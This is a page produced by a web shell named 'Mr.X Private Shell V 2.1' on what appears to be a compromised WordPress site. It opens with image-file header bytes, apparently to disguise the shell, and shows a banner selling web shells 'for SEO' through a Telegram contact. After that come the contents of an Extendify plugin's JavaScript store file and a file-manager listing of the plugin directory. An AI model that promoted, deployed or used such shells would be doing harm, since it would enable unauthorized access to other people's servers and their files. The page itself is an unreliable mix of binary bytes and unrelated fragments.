����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { create } from 'zustand';
import { devtools } from 'zustand/middleware';
const state = (set) => ({
open: false,
setOpen: (open) => set({ open }),
progress: '',
setProgress: (progress) => set({ progress }),
regenerationCount: 0,
incrementRegenerationCount: () =>
set((state) => ({ regenerationCount: state.regenerationCount + 1 })),
});
export const useGlobalsStore = create(
devtools(state, { name: 'Extendify Page Creator Globals' }),
state,
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| cache.js | File | 387 B | 0644 |
|
| global.js | File | 466 B | 0644 |
|
| pages.js | File | 1.52 KB | 0644 |
|
| plugins-cache.js | File | 666 B | 0644 |
|
| user.js | File | 944 B | 0644 |
|